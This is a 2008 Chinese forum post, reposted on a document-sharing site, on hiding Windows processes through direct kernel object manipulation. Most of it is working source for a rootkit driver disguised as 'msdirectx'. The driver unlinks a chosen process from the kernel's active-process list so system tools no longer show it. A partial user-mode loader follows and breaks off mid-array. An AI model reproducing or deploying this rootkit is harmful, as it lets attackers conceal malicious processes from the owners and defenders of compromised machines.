直接修改内核对象隐藏进程.docx
《直接修改内核对象隐藏进程.docx》由会员分享,可在线阅读,更多相关《直接修改内核对象隐藏进程.docx(20页珍藏版)》请在冰豆网上搜索。
直接修改内核对象隐藏进程
标题:
【原创】直接修改内核对象隐藏进程
作者:
guolijie
时间:
2008-05-12,10:
13:
16
链接:
Windows NT/2000/XP/2003操作系统具有描述了进程的可执行对象。
Taskmgr.exe列出机器上运行的进程。
ZwQuerySystemInformation 也使用这 些 对象列出运行的进程,修改这 些 对象,可以隐藏进程。
通过遍历 在每 个进程的EPROCESS结构中引用的一个双向链表,EPROCESS结构包含一个具有指针成员FLINK和BLINK的lLIST_ENTRY结构。
这两个指针分别指向当前进程描述符的前方和后方进程,通过修改这 两个指针可以隐藏指定进程。
本程序通过用户空间程序获的进程ID,EPROCESS块 中FLINK和 PID的偏移量 ,传送给驱动程序,驱动程序修改链表隐藏进程。
而通过PsGetCurrentProcess可以得到当前进程的指针,顺藤摸瓜就可找到要隐藏的进程。
以下是代码。
驱动程序
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
int FLINKOFFSET;
int PIDOFFSET;
PDEVICE_OBJECT g_RootkitDevice;
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
#define DebugPrint DbgPrint
DWORD FindProcessEPROC(int);//遍历链表寻找要隐藏的进程的函数
NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS RootkitDeviceControl(IN PFILE_OBJECT, IN BOOLEAN, IN PVOID,
IN ULONG, OUT PVOID, IN ULONG, IN ULONG,
OUT PIO_STATUS_BLOCK, IN PDEVICE_OBJECT
);
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
ntStatus = IoCreateDevice ( DriverObject,
0, // For driver extension
&deviceNameUnicodeString,
FILE_DEVICE_ROOTKIT,
0,
TRUE,
&g_RootkitDevice );
if( NT_SUCCESS(ntStatus)) {
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch;
DriverObject->DriverUnload = RootkitUnload;
}
else
{
DebugPrint(("Failed to create device!
\n"));
return ntStatus;
}
return STATUS_SUCCESS;
}
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj !
= NULL)
{
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
NTSTATUS
RootkitDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntstatus;
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
irpStack = IoGetCurrentIrpStackLocation (Irp);
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
ntstatus = RootkitDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
}
NTSTATUS
RootkitDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
int find_PID = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case IOCTL_ROOTKIT_INIT:
if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
PIDOFFSET = (int) (*(int *)InputBuffer);//从用户空间得到PID和FLINKOFFSET
FLINKOFFSET = (int) (*((int *)InputBuffer+1));
break;
case IOCTL_ROOTKIT_HIDEME:
if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
find_PID = *((DWORD *)InputBuffer);//从用户空间程序得到隐藏进程ID号
if (find_PID == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);//通过ID号找到对应进程
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);//隐藏进程
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
break;
default:
IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return IoStatus->Status;
}
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
eproc = (DWORD) PsGetCurrentProcess();//得到当前进程的PLIST_ENTRY
start_PID = *((DWORD*)(eproc+PIDOFFSET));//PIDOFFSET为PLIST_ENTRY中保存进程ID的偏移量。
current_PID = start_PID;
while
(1)//遍历链表比较进程ID找到要隐藏的进程的PLIST_ENTRY
{
if(terminate_PID == current_PID)
return eproc;
else if((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
}
2 用户空间程序
#include "stdafx.h"
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SECURITY_STRING_LEN 168
#define LG_PAGE_SIZE 4096
#define MAX_KEY_LENGTH 1024
#define LG_SLEEP_TIME 4000
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
HANDLE gh_Device = INVALID_HANDLE_VALUE;
static CHAR ac_driverLabel[]="msdirectx";
static CHAR ac_driverName[]="msdirectx.sys";
DWORD pid;
HANDLE h_Device = INVALID_HANDLE_VALUE;
DWORD d_bytesRead, d_error;
CHAR ac_driverPath[MAX_PATH];
BOOL bOsVersionInfoEx;
BOOL Found = FALSE;
CHAR acModulePath[MAX_PATH];
int pid_offset = 0;
int flink_offset = 0;
int authid_offset = 0;
int token_offset = 0;
int privcount_offset = 0;
int privaddr_offset = 0;
int sidcount_offset = 0;
int sidaddr_offset = 0;
char m_szDriverExt[MAX_PATH];
char DriverName[MAX_PATH];
char sz_drivername[MAX_PATH];
char m_szDriverFullPath[MAX_PATH];
PROCESSENTRY32 stProcess;
const BYTE g_szSecurity[SECURITY_STRING_LEN]=
{
0x01,0x00,0x14,0x80,0x90,0x00,0x00,0x00,0x9c,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,
0x00,0x1c,0x00,0x01,0x00,0x00,0x00,0x02,0x80,0x14,0x00,0xff,0x01,0x0f,0x00,0x01,0x01,0x00,0x00,0x00,0x00,
0x00,0x01,0x00,0x00,0x00,0x00,0x02,0x00,0x60,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0xfd,0x01,0x02,
0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xff,0x01,0x0f,0x00,
0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x20,0x02,0x00,0x00,0x00,0x00,0x14,0x00,0x8d,
0x01,0x02,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x0b,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xfd,0x01,
0x02,0x00,0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x23,0x02,0x00,0x00,0x01,0x01,0x00,
0x00,0x00
升级会员 